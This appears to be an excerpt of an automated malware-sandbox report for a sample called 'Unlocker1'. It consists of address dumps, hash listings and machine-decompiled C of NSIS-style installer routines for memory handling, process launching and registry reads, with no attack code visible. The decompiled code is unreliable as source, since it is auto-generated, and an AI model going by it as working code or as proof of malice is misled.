                                                                                                                                                              0x00406734
                                                                                                                                                              0x00406737
                                                                                                                                                              0x00406750
                                                                                                                                                              0x00406753
                                                                                                                                                              0x00406756
                                                                                                                                                              0x00406759
                                                                                                                                                              0x0040675d
                                                                                                                                                              0x0040675f
                                                                                                                                                              0x0040675f
                                                                                                                                                              0x00406760
                                                                                                                                                              0x00406763
                                                                                                                                                              0x00406739
                                                                                                                                                              0x00406739
                                                                                                                                                              0x00406741
                                                                                                                                                              0x00406746
                                                                                                                                                              0x00406748
                                                                                                                                                              0x0040674b
                                                                                                                                                              0x0040674b
                                                                                                                                                              0x00406766
                                                                                                                                                              0x0040676d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040676f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040676f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040640b
                                                                                                                                                              0x0040640e
                                                                                                                                                              0x00406444
                                                                                                                                                              0x00406574
                                                                                                                                                              0x00406574
                                                                                                                                                              0x00406574
                                                                                                                                                              0x00406574
                                                                                                                                                              0x00406577
                                                                                                                                                              0x00406577
                                                                                                                                                              0x0040657a
                                                                                                                                                              0x0040657c
                                                                                                                                                              0x00406806
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406806
                                                                                                                                                              0x00406582
                                                                                                                                                              0x00406585
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040658b
                                                                                                                                                              0x0040658f
                                                                                                                                                              0x00406592
                                                                                                                                                              0x00406592
                                                                                                                                                              0x00406592
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406592
                                                                                                                                                              0x00406410
                                                                                                                                                              0x00406412
                                                                                                                                                              0x00406414
                                                                                                                                                              0x00406416
                                                                                                                                                              0x00406419
                                                                                                                                                              0x0040641a
                                                                                                                                                              0x0040641c
                                                                                                                                                              0x0040641e
                                                                                                                                                              0x00406421
                                                                                                                                                              0x00406424
                                                                                                                                                              0x0040643a
                                                                                                                                                              0x0040643f
                                                                                                                                                              0x00406477
                                                                                                                                                              0x00406477
                                                                                                                                                              0x0040647b
                                                                                                                                                              0x004064a7
                                                                                                                                                              0x004064a9
                                                                                                                                                              0x004064b0
                                                                                                                                                              0x004064b3
                                                                                                                                                              0x004064b6
                                                                                                                                                              0x004064b6
                                                                                                                                                              0x004064bb
                                                                                                                                                              0x004064bb
                                                                                                                                                              0x004064bd
                                                                                                                                                              0x004064c0
                                                                                                                                                              0x004064c7
                                                                                                                                                              0x004064ca
                                                                                                                                                              0x004064f7
                                                                                                                                                              0x004064f7
                                                                                                                                                              0x004064fa
                                                                                                                                                              0x004064fd
                                                                                                                                                              0x00406571
                                                                                                                                                              0x00406571
                                                                                                                                                              0x00406571
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406571
                                                                                                                                                              0x004064ff
                                                                                                                                                              0x00406505
                                                                                                                                                              0x00406508
                                                                                                                                                              0x0040650b
                                                                                                                                                              0x0040650e
                                                                                                                                                              0x00406511
                                                                                                                                                              0x00406514
                                                                                                                                                              0x00406517
                                                                                                                                                              0x0040651a
                                                                                                                                                              0x0040651d
                                                                                                                                                              0x00406520
                                                                                                                                                              0x00406539
                                                                                                                                                              0x0040653b
                                                                                                                                                              0x0040653e
                                                                                                                                                              0x0040653f
                                                                                                                                                              0x00406542
                                                                                                                                                              0x00406544
                                                                                                                                                              0x00406547
                                                                                                                                                              0x00406549
                                                                                                                                                              0x0040654b
                                                                                                                                                              0x0040654e
                                                                                                                                                              0x00406550
                                                                                                                                                              0x00406553
                                                                                                                                                              0x00406557
                                                                                                                                                              0x00406559
                                                                                                                                                              0x00406559
                                                                                                                                                              0x0040655a
                                                                                                                                                              0x0040655d
                                                                                                                                                              0x00406560
                                                                                                                                                              0x00406522
                                                                                                                                                              0x00406522
                                                                                                                                                              0x0040652a
                                                                                                                                                              0x0040652f
                                                                                                                                                              0x00406531
                                                                                                                                                              0x00406534
                                                                                                                                                              0x00406534
                                                                                                                                                              0x00406563
                                                                                                                                                              0x0040656a
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040656c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040656c
                                                                                                                                                              0x0040656a
                                                                                                                                                              0x0040647d
                                                                                                                                                              0x00406480
                                                                                                                                                              0x00406482
                                                                                                                                                              0x00406485
                                                                                                                                                              0x00406488
                                                                                                                                                              0x0040648b
                                                                                                                                                              0x0040648d
                                                                                                                                                              0x00406490
                                                                                                                                                              0x00406493
                                                                                                                                                              0x00406493
                                                                                                                                                              0x00406496
                                                                                                                                                              0x00406496
                                                                                                                                                              0x00406499
                                                                                                                                                              0x004064a0
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004064a2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004064a2
                                                                                                                                                              0x004064a0
                                                                                                                                                              0x00406426
                                                                                                                                                              0x00406429
                                                                                                                                                              0x0040642b
                                                                                                                                                              0x0040642e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040618d
                                                                                                                                                              0x0040618d
                                                                                                                                                              0x00406191
                                                                                                                                                              0x004067d6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067d6
                                                                                                                                                              0x00406197
                                                                                                                                                              0x0040619a
                                                                                                                                                              0x0040619d
                                                                                                                                                              0x004061a0
                                                                                                                                                              0x004061a3
                                                                                                                                                              0x004061a6
                                                                                                                                                              0x004061a9
                                                                                                                                                              0x004061ab
                                                                                                                                                              0x004061ae
                                                                                                                                                              0x004061b1
                                                                                                                                                              0x004061b4
                                                                                                                                                              0x004061b6
                                                                                                                                                              0x004061b6
                                                                                                                                                              0x004061b6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406318
                                                                                                                                                              0x00406318
                                                                                                                                                              0x0040631c
                                                                                                                                                              0x004067e2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067e2
                                                                                                                                                              0x00406322
                                                                                                                                                              0x00406325
                                                                                                                                                              0x00406328
                                                                                                                                                              0x0040632b
                                                                                                                                                              0x0040632d
                                                                                                                                                              0x0040632d
                                                                                                                                                              0x0040632d
                                                                                                                                                              0x00406330
                                                                                                                                                              0x00406333
                                                                                                                                                              0x00406336
                                                                                                                                                              0x00406339
                                                                                                                                                              0x0040633c
                                                                                                                                                              0x0040633f
                                                                                                                                                              0x00406340
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406342
                                                                                                                                                              0x00406345
                                                                                                                                                              0x00406348
                                                                                                                                                              0x0040634b
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x0040634e
                                                                                                                                                              0x00406351
                                                                                                                                                              0x00406353
                                                                                                                                                              0x00406353
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406599
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040659f
                                                                                                                                                              0x004065a2
                                                                                                                                                              0x004065a5
                                                                                                                                                              0x004065a8
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065ad
                                                                                                                                                              0x004065b0
                                                                                                                                                              0x004065b3
                                                                                                                                                              0x004065b6
                                                                                                                                                              0x004065b9
                                                                                                                                                              0x004065bc
                                                                                                                                                              0x004065bd
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065c2
                                                                                                                                                              0x004065c5
                                                                                                                                                              0x004065c8
                                                                                                                                                              0x004065cb
                                                                                                                                                              0x004065ce
                                                                                                                                                              0x004065d2
                                                                                                                                                              0x004065d4
                                                                                                                                                              0x004065d7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004065d9
                                                                                                                                                              0x00406356
                                                                                                                                                              0x00406356
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406356
                                                                                                                                                              0x004065d7
                                                                                                                                                              0x0040680c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e3b
                                                                                                                                                              0x00406843
                                                                                                                                                              0x00406843
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406843
                                                                                                                                                              0x00406690
                                                                                                                                                              0x00406617
                                                                                                                                                              0x00406614

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: be6e9d30e93fbb49eb3c361b8f1c94b7932ac8d56391751c3e2361f0828e0a06
                                                                                                                                                              • Instruction ID: f7c6f07f586ed293a1c67bf574783cb577a0acbc2814a7f5ecfd539a56c9ebac
                                                                                                                                                              • Opcode Fuzzy Hash: be6e9d30e93fbb49eb3c361b8f1c94b7932ac8d56391751c3e2361f0828e0a06
                                                                                                                                                              • Instruction Fuzzy Hash: AF715671D00229CBDF28CF98C844BADBBB1FF44305F15816AD816BB281C7785A46DF54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00401B06 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 59%
                                                                                                                                                              			E00401B06(void* __ebx, void* __edx) {
				intOrPtr _t7;
				void* _t8;
				void _t11;
				void* _t13;
				void* _t21;
				void* _t24;
				void* _t30;
				void* _t33;
				void* _t34;
				void* _t37;

				_t27 = __ebx;
				_t7 =  *((intOrPtr*)(_t37 - 0x1c));
				_t30 =  *0x40af50; // 0x0
				if(_t7 == __ebx) {
					if(__edx == __ebx) {
						_t8 = GlobalAlloc(0x40, 0x404); // executed
						_t34 = _t8;
						_t4 = _t34 + 4; // 0x4
						E004059FF(__ebx, _t30, _t34, _t4,  *((intOrPtr*)(_t37 - 0x24)));
						_t11 =  *0x40af50; // 0x0
						 *_t34 = _t11;
						 *0x40af50 = _t34;
					} else {
						if(_t30 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t2 = _t30 + 4; // 0x4
							E004059DD(_t33, _t2);
							_push(_t30);
							 *0x40af50 =  *_t30;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t7 = _t7 - 1;
						if(_t30 == _t27) {
							break;
						}
						_t30 =  *_t30;
						if(_t7 != _t27) {
							continue;
						} else {
							if(_t30 == _t27) {
								break;
							} else {
								_t32 = _t30 + 4;
								E004059DD(0x409b50, _t30 + 4);
								_t21 =  *0x40af50; // 0x0
								E004059DD(_t32, _t21 + 4);
								_t24 =  *0x40af50; // 0x0
								_push(0x409b50);
								_push(_t24 + 4);
								E004059DD();
								L15:
								 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t37 - 4));
								_t13 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E004059FF(_t27, _t30, _t33, _t27, 0xffffffe8));
					E0040529E();
					_t13 = 0x7fffffff;
				}
				L17:
				return _t13;
			}













                                                                                                                                                              0x00401b06
                                                                                                                                                              0x00401b06
                                                                                                                                                              0x00401b09
                                                                                                                                                              0x00401b11
                                                                                                                                                              0x00401b59
                                                                                                                                                              0x00401b87
                                                                                                                                                              0x00401b90
                                                                                                                                                              0x00401b92
                                                                                                                                                              0x00401b96
                                                                                                                                                              0x00401b9b
                                                                                                                                                              0x00401ba0
                                                                                                                                                              0x00401ba2
                                                                                                                                                              0x00401b5b
                                                                                                                                                              0x00401b5d
                                                                                                                                                              0x0040265c
                                                                                                                                                              0x00401b63
                                                                                                                                                              0x00401b63
                                                                                                                                                              0x00401b68
                                                                                                                                                              0x00401b6f
                                                                                                                                                              0x00401b70
                                                                                                                                                              0x00401b75
                                                                                                                                                              0x00401b75
                                                                                                                                                              0x00401b5d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401b13
                                                                                                                                                              0x00401b13
                                                                                                                                                              0x00401b13
                                                                                                                                                              0x00401b16
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401b1c
                                                                                                                                                              0x00401b20
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401b22
                                                                                                                                                              0x00401b24
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401b2a
                                                                                                                                                              0x00401b2a
                                                                                                                                                              0x00401b34
                                                                                                                                                              0x00401b39
                                                                                                                                                              0x00401b43
                                                                                                                                                              0x00401b48
                                                                                                                                                              0x00401b4d
                                                                                                                                                              0x00401b51
                                                                                                                                                              0x004027b1
                                                                                                                                                              0x0040288b
                                                                                                                                                              0x0040288e
                                                                                                                                                              0x00402894
                                                                                                                                                              0x00402894
                                                                                                                                                              0x00401b24
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401b20
                                                                                                                                                              0x004021fb
                                                                                                                                                              0x00402208
                                                                                                                                                              0x00402209
                                                                                                                                                              0x0040220e
                                                                                                                                                              0x0040220e
                                                                                                                                                              0x00402896
                                                                                                                                                              0x0040289a

                                                                                                                                                              APIs
                                                                                                                                                              • GlobalFree.KERNEL32 ref: 00401B75
                                                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401B87
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                                              • String ID: show
                                                                                                                                                              • API String ID: 3394109436-839833857
                                                                                                                                                              • Opcode ID: 0c325e54f346298ce71c2e49e0b07d342970ac7a60d073ea7525efb906efe417
                                                                                                                                                              • Instruction ID: dedcc356a049729cc32aa0533657a7b943fc31f5ec42b7739970f76d43a2a4df
                                                                                                                                                              • Opcode Fuzzy Hash: 0c325e54f346298ce71c2e49e0b07d342970ac7a60d073ea7525efb906efe417
                                                                                                                                                              • Instruction Fuzzy Hash: D221A8B2604202DBD710FBA4DE8595F73A4FB44328724453BF606F32D0EB78A8119B6E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00401E1B Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 82%
                                                                                                                                                              			E00401E1B() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E004029F6(_t24);
				E00404D7B(0xffffffeb, _t13); // executed
				_t15 = E0040523D(_t28); // executed
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E00405D38(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 8); // executed
						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
							if( *(_t31 - 8) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E0040593B(_t26,  *(_t31 - 8));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}







                                                                                                                                                              0x00401e21
                                                                                                                                                              0x00401e26
                                                                                                                                                              0x00401e2c
                                                                                                                                                              0x00401e33
                                                                                                                                                              0x00401e36
                                                                                                                                                              0x0040265c
                                                                                                                                                              0x00401e3c
                                                                                                                                                              0x00401e3f
                                                                                                                                                              0x00401e50
                                                                                                                                                              0x00401e4b
                                                                                                                                                              0x00401e4b
                                                                                                                                                              0x00401e65
                                                                                                                                                              0x00401e6e
                                                                                                                                                              0x00401e7e
                                                                                                                                                              0x00401e80
                                                                                                                                                              0x00401e80
                                                                                                                                                              0x00401e70
                                                                                                                                                              0x00401e74
                                                                                                                                                              0x00401e74
                                                                                                                                                              0x00401e6e
                                                                                                                                                              0x00401e87
                                                                                                                                                              0x00401e8a
                                                                                                                                                              0x00401e8a
                                                                                                                                                              0x0040288e
                                                                                                                                                              0x0040289a

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00404D7B: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000,007D06EE,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
                                                                                                                                                                • Part of subcall function 00404D7B: lstrlenA.KERNEL32(00402F8B,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000,007D06EE,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
                                                                                                                                                                • Part of subcall function 00404D7B: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00402F8B,00402F8B,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,00000000,007D06EE,00000000), ref: 00404DD7
                                                                                                                                                                • Part of subcall function 00404D7B: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsv5446.tmp\), ref: 00404DE9
                                                                                                                                                                • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E0F
                                                                                                                                                                • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E29
                                                                                                                                                                • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E37
                                                                                                                                                                • Part of subcall function 0040523D: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422480,Error launching installer), ref: 00405262
                                                                                                                                                                • Part of subcall function 0040523D: CloseHandle.KERNEL32(?), ref: 0040526F
                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E55
                                                                                                                                                              • GetExitCodeProcess.KERNELBASE ref: 00401E65
                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401E8A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3521207402-0
                                                                                                                                                              • Opcode ID: 7b5ea6098163a721225316e6cb59af18a26e7111e3aadd83b40fd5b5fc9d02e7
                                                                                                                                                              • Instruction ID: e59f33a83564baa95368ed7ffa3d517a66a6b48d9bc55f4210568fb4246de59a
                                                                                                                                                              • Opcode Fuzzy Hash: 7b5ea6098163a721225316e6cb59af18a26e7111e3aadd83b40fd5b5fc9d02e7
                                                                                                                                                              • Instruction Fuzzy Hash: DB018071D04114EBCF11AFA1CD8599E7A75EF00348F20803BFA05B51E1C3794A81DB9A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004058C4 Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 90%
                                                                                                                                                              			E004058C4(void* _a4, int _a8, char* _a12, int _a16, void* _a20) {
				long _t20;
				long _t23;
				long _t24;
				char* _t26;

				asm("sbb eax, eax");
				_t26 = _a16;
				 *_t26 = 0;
				_t20 = RegOpenKeyExA(_a4, _a8, 0,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				if(_t20 == 0) {
					_a8 = 0x400;
					_t23 = RegQueryValueExA(_a20, _a12, 0,  &_a16, _t26,  &_a8); // executed
					if(_t23 != 0 || _a16 != 1 && _a16 != 2) {
						 *_t26 = 0;
					}
					_t26[0x3ff] = 0;
					_t24 = RegCloseKey(_a20); // executed
					return _t24;
				}
				return _t20;
			}







                                                                                                                                                              0x004058d4
                                                                                                                                                              0x004058d6
                                                                                                                                                              0x004058e3
                                                                                                                                                              0x004058ed
                                                                                                                                                              0x004058f5
                                                                                                                                                              0x004058fa
                                                                                                                                                              0x0040590e
                                                                                                                                                              0x00405916
                                                                                                                                                              0x00405924
                                                                                                                                                              0x00405924
                                                                                                                                                              0x00405929
                                                                                                                                                              0x0040592f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040592f
                                                                                                                                                              0x00405938

                                                                                                                                                              APIs
                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,00405B00,00000000,00000002,?,00000002,00321F35,?,00405B00,80000002,Software\Microsoft\Windows\CurrentVersion,00321F35,Remove folder: ,00745DED), ref: 004058ED
                                                                                                                                                              • RegQueryValueExA.KERNELBASE(00321F35,?,00000000,00405B00,00321F35,00405B00), ref: 0040590E
                                                                                                                                                              • RegCloseKey.KERNELBASE(?), ref: 0040592F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3677997916-0
                                                                                                                                                              • Opcode ID: 20ca1dc64cf80f35bde4a5a459f169022cfe0f17446037da1f5ac97088a586f8
                                                                                                                                                              • Instruction ID: 4090c2ea748c6a1ef83dea1f090ecbfc83cda06d8c091eb14dd66de5cad0d057
                                                                                                                                                              • Opcode Fuzzy Hash: 20ca1dc64cf80f35bde4a5a459f169022cfe0f17446037da1f5ac97088a586f8
                                                                                                                                                              • Instruction Fuzzy Hash: DA0156B144020EEFDF228F64EC48AEB3FACEF143A4F004436F944A6220D235D964DBA5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00402427 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                              			E00402427(int* __ebx, char* __esi) {
				int _t8;
				long _t11;
				int* _t14;
				void* _t18;
				char* _t20;
				void* _t22;
				void* _t25;

				_t20 = __esi;
				_t14 = __ebx;
				_t18 = E00402B00(_t25, 0x20019);
				_t8 = E004029D9(3);
				 *__esi = __ebx;
				if(_t18 == __ebx) {
					L7:
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					 *(_t22 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t22 - 0x14)) == __ebx) {
						_t11 = RegEnumValueA(_t18, _t8, __esi, _t22 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t11;
						if(_t11 != 0) {
							goto L7;
						} else {
							goto L4;
						}
					} else {
						RegEnumKeyA(_t18, _t8, __esi, 0x3ff);
						L4:
						_t20[0x3ff] = _t14;
						_push(_t18); // executed
						RegCloseKey(); // executed
					}
				}
				 *0x423f08 =  *0x423f08 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}










                                                                                                                                                              0x00402427
                                                                                                                                                              0x00402427
                                                                                                                                                              0x00402433
                                                                                                                                                              0x00402435
                                                                                                                                                              0x0040243c
                                                                                                                                                              0x0040243e
                                                                                                                                                              0x0040265c
                                                                                                                                                              0x0040265c
                                                                                                                                                              0x00402444
                                                                                                                                                              0x0040244c
                                                                                                                                                              0x0040244f
                                                                                                                                                              0x00402468
                                                                                                                                                              0x0040246e
                                                                                                                                                              0x00402470
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402451
                                                                                                                                                              0x00402455
                                                                                                                                                              0x00402476
                                                                                                                                                              0x00402476
                                                                                                                                                              0x0040247c
                                                                                                                                                              0x0040247d
                                                                                                                                                              0x0040247d
                                                                                                                                                              0x0040244f
                                                                                                                                                              0x0040288e
                                                                                                                                                              0x0040289a

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00402B00: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B28
                                                                                                                                                              • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402455
                                                                                                                                                              • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402468
                                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsv5446.tmp,00000000,?,?,?,00000100,?,?,?,00000011,00000002), ref: 0040247D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
